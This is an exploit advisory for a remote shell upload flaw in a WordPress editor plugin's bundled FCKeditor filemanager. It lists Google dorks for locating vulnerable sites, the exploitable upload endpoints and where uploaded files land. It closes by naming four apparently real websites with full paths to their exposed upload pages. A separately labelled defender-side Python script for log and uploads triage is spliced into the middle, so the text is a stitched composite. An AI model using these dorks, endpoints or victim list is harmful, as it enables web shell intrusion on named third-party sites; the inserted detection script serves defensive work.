###########################################################################################################
# Exploit Title : WordPress Monsters-Editor-10-For-WP-Super-Edit Plugins 2.3.1 Remote Shell Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 20/12/2018
# Vendor Homepage : thedevcouple.com ~ wordpress.org/plugins/monsters-editor-10-for-wp-super-edit/ + github.com/wp-plugins/monsters-editor-10-for-wp-super-edit
# Software Download Link : downloads.wordpress.org/plugin/monsters-editor-10-for-wp-super-edit.zip
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 2.1 and 2.3.1
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/'' + intext:''Using the fMulti theme design by Fredrik Fahlstad Proudly powered by WordPress.'' + intext:''Website Design by Cynscreations.com.'' + intext:''Powered by Aquino Media | Designed by Aquino Media Group''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ] + CWE-434: Unrestricted Upload of File with Dangerous Type
# Visit Web Security Blog and Forum : cyberizm.org [ Team ] ~ ayarsecurity.com [ Friend ]
###########################################################################################################
# Exploit :
/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html
/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/browser/default/browser.html
/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/browser/default/frmupload.html
# Directory File Path :
/wp-content/uploads/......
/wp-content/uploads/[YEAR]/[MONTH]....
#################################################################################################
# Note : This plugin, Monsters-Editor-10-For-WP-Super-Edit, contains a very serious vulnerability that allows attackers to gain full control and to modify, upload and execute files on any website running WordPress. With the plugin installed on a website, a hacker or malicious person can gain access to the web server via HTTP through a backdoor in the plugin's directory.
###########################################################################################################
Vulnerable File Code => /test.html
********************************
[ Form from test.html ("FCKeditor - Uploaders Tests"); only the field labels survived extraction ]
Select the "File Uploader" to use:
Custom Uploader URL:
Upload a new file:
Uploaded File URL:
Post URL:
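Added defender-side example (not part of the advisory, the plugin, or FCKeditor): a small triage script a WordPress administrator can run to check whether the legacy FCKeditor filemanager shipped under this plugin's path has been touched, and whether anything executable has landed under wp-content/uploads. It assumes the web server writes combined log format; the sample log lines, the connector path used in the sample POST line (FCKeditor's `upload/php/upload.php`, assumed rather than taken from the advisory) and the temporary uploads tree are all constructed here for the demonstration.

```python
"""Triage helpers for the FCKeditor filemanager exposure described in the advisory.

Two checks:
  1. scan_access_log: flag access log lines whose request path reaches the
     FCKeditor filemanager under the plugin directory (GET = reconnaissance of
     test.html / browser.html / frmupload.html, POST = upload attempt);
  2. find_executable_uploads: walk an uploads tree and list files that are not
     plain media (PHP and friends, including double extensions), which is where
     a successful unauthenticated upload would land.

All sample data below is constructed for the example; nothing comes from a real site.
"""
import os
import re
import tempfile
from typing import Dict, List, Tuple

# Path fragment shared by all three endpoints listed in the advisory.
PLUGIN_FM_PATH = (
    "/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/"
)

# Combined log format: ip - - [timestamp] "METHOD path PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Extensions that must never appear under wp-content/uploads.
# Assumption: the site serves only media and documents from that tree.
DANGEROUS_EXT = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar"}


def scan_access_log(lines: List[str]) -> List[Dict[str, str]]:
    """Return one finding per request that touches the FCKeditor filemanager."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined log format; skip rather than guess
        path = m.group("path").split("?", 1)[0]  # drop the query string
        if PLUGIN_FM_PATH not in path:
            continue
        severity = "high" if m.group("method") == "POST" else "medium"
        findings.append({
            "ip": m.group("ip"),
            "method": m.group("method"),
            "path": path,
            "status": m.group("status"),
            "severity": severity,
        })
    return findings


def is_dangerous_name(name: str) -> bool:
    """True for server-executable names, .htaccess, and double extensions like x.php.jpg."""
    lower = name.lower()
    if lower == ".htaccess":
        return True  # a dropped .htaccess can re-enable PHP execution in uploads
    parts = lower.split(".")
    # Last part is the real extension; inner parts catch shell.php.jpg style names.
    return any("." + p in DANGEROUS_EXT for p in parts[1:])


def find_executable_uploads(uploads_dir: str) -> List[str]:
    """Walk an uploads directory and return sorted relative paths of dangerous files."""
    hits = []
    for root, _dirs, files in os.walk(uploads_dir):
        for name in files:
            if is_dangerous_name(name):
                hits.append(os.path.relpath(os.path.join(root, name), uploads_dir))
    return sorted(hits)


def demo() -> Tuple[List[Dict[str, str]], List[str]]:
    """Run both checks on constructed data and return their results."""
    fm = PLUGIN_FM_PATH
    # Constructed log lines (RFC 5737 documentation addresses, not real clients).
    sample_log = [
        f'203.0.113.5 - - [20/Dec/2018:10:01:02 +0000] "GET {fm}upload/test.html HTTP/1.1" 200 2311 "-" "Mozilla/5.0"',
        f'203.0.113.5 - - [20/Dec/2018:10:01:09 +0000] "POST {fm}upload/php/upload.php?Type=File HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
        '198.51.100.7 - - [20/Dec/2018:10:02:00 +0000] "GET /wp-login.php HTTP/1.1" 200 4000 "-" "Mozilla/5.0"',
        '198.51.100.7 - - [20/Dec/2018:10:02:30 +0000] "GET /wp-content/uploads/2018/12/photo.jpg HTTP/1.1" 200 90000 "-" "Mozilla/5.0"',
    ]
    # Constructed uploads tree in a temp dir, mirroring /wp-content/uploads/[YEAR]/[MONTH].
    uploads = tempfile.mkdtemp(prefix="wp-uploads-")
    for rel in ("2018/12/photo.jpg", "2018/12/report.pdf", "2018/12/shell.php", "2018/12/image.php.jpg"):
        full = os.path.join(uploads, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write("placeholder")
    return scan_access_log(sample_log), find_executable_uploads(uploads)


if __name__ == "__main__":
    log_findings, bad_files = demo()
    for f in log_findings:
        print(f"[{f['severity']}] {f['ip']} {f['method']} {f['path']} -> {f['status']}")
    for rel in bad_files:
        print(f"[dangerous file] wp-content/uploads/{rel}")
```

Any finding from the first check means the filemanager is reachable and should be blocked at the web server (deny the whole `.../mse/fckeditor/editor/filemanager/` directory) until the plugin is removed; any hit from the second check is evidence of a completed upload and calls for incident response rather than just cleanup. Disabling PHP execution under wp-content/uploads at the web server is the mitigation that holds regardless of which plugin exposed the upload path.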
###########################################################################################################
# Example Vulnerable Sites =>
[+] dionysusrecords.com/main/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html
[+] dfrere.fr/Blog01/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html
[+] mark.langkau.org/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html
[+] tonyaquino.com/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html
###########################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
###########################################################################################################